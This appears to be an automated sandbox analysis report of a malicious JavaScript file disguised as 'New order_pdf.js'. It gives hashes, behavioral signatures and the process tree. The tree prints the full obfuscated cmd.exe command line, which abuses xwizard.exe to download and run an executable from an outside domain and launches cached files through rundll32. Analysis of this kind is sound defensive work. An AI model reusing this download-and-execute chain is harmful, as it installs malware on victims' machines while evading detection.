Analysis
-
max time kernel
122s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
12-10-2023 04:06
Static task
static1
Behavioral task
behavioral1
Sample
New order_pdf.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
New order_pdf.js
Resource
win10v2004-20230915-en
General
-
Target
New order_pdf.js
-
Size
612B
-
MD5
d875685d675d779c80ff67110838ba5b
-
SHA1
d79aeb0400d6e30375923ce08bdca636abb44dbd
-
SHA256
7b979e6e64a9fe84467dbb0ebc197f99280fb9dcd6e7675238d898902a570a2a
-
SHA512
2482ade29ce066832388da332f6682adcb1535a33c9c92220447e555bc83f3168f7fed12f2c403c4555a7b9c17f9aa4a8a3fb6cea7974405ed866d991e149036
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2616 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 2484 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2484 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2988 rundll32.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2096 wrote to memory of 1112 2096 wscript.exe 30 PID 2096 wrote to memory of 1112 2096 wscript.exe 30 PID 2096 wrote to memory of 1112 2096 wscript.exe 30 PID 1112 wrote to memory of 2988 1112 cmd.exe 32 PID 1112 wrote to memory of 2988 1112 cmd.exe 32 PID 1112 wrote to memory of 2988 1112 cmd.exe 32 PID 1112 wrote to memory of 2688 1112 cmd.exe 34 PID 1112 wrote to memory of 2688 1112 cmd.exe 34 PID 1112 wrote to memory of 2688 1112 cmd.exe 34 PID 2688 wrote to memory of 2616 2688 cmd.exe 37 PID 2688 wrote to memory of 2616 2688 cmd.exe 37 PID 2688 wrote to memory of 2616 2688 cmd.exe 37 PID 1112 wrote to memory of 2584 1112 cmd.exe 36 PID 1112 wrote to memory of 2584 1112 cmd.exe 36 PID 1112 wrote to memory of 2584 1112 cmd.exe 36 PID 2688 wrote to memory of 2484 2688 cmd.exe 39 PID 2688 wrote to memory of 2484 2688 cmd.exe 39 PID 2688 wrote to memory of 2484 2688 cmd.exe 39 PID 1112 wrote to memory of 2940 1112 cmd.exe 41 PID 1112 wrote to memory of 2940 1112 cmd.exe 41 PID 1112 wrote to memory of 2940 1112 cmd.exe 41 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\New order_pdf.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C devicecreDEntIAldepLoymENt.EXE & RUNDLL32 INEtCPl.cpL , ClearMyTracksByProcess 8 && (ecHO DEviCeCrEdenTIalDepLoyMeNt ^& timEouT /t 7 /nObreaK ^&^& TAskkiLl.EXe /F /iM XwiZarD.eXe) > C:\Users\Admin\AppData\Local\Temp\e3Wmwnbk.bAT && STart C:\Users\Admin\AppData\Local\Temp\e3Wmwnbk.bAt & xWizArD RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} -z https://najmuddin.com/p/Protected5.exe & FOR /f %a iN ( ' dIr C:\Users\Admin\AppData\Local\mICrosoFt\WindowS\INETcAchE\ie\ /s /B ' ) Do RUnDLl32.exe url.dll,FileProtocolHandler %a && Del C:\Users\Admin\AppData\Local\Temp\e3Wmwnbk.bAt2⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\system32\rundll32.exeRUNDLL32 INEtCPl.cpL , ClearMyTracksByProcess 83⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
PID:2988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\e3Wmwnbk.bAt3⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\timeout.exetimEouT /t 7 /nObreaK4⤵
- Delays execution with timeout.exe
PID:2616
-
-
C:\Windows\system32\taskkill.exeTAskkiLl.EXe /F /iM XwiZarD.eXe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
-
C:\Windows\system32\xwizard.exexWizArD RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} -z https://najmuddin.com/p/Protected5.exe3⤵PID:2584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dIr C:\Users\Admin\AppData\Local\mICrosoFt\WindowS\INETcAchE\ie\ /s /B3⤵PID:2940
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
87B
MD5a9a006e7db555c3e71d0f2e2e05e3c7f
SHA1773b35abcfdf9fd58714667c863a28dab6fafc02
SHA25687e0e51e613eb16bf0ec059bfbd7faf0c067dc5afa9e33f85113f6565f54d92e
SHA51259348bdfc1e0c6a1d742cb20b3f7f6ab59063a6ad9639b889d41c32f2d0fe89dbf0b95ec3ba8c4cc6bcbdf1e51009f20967983687e852eae8630758333cd9419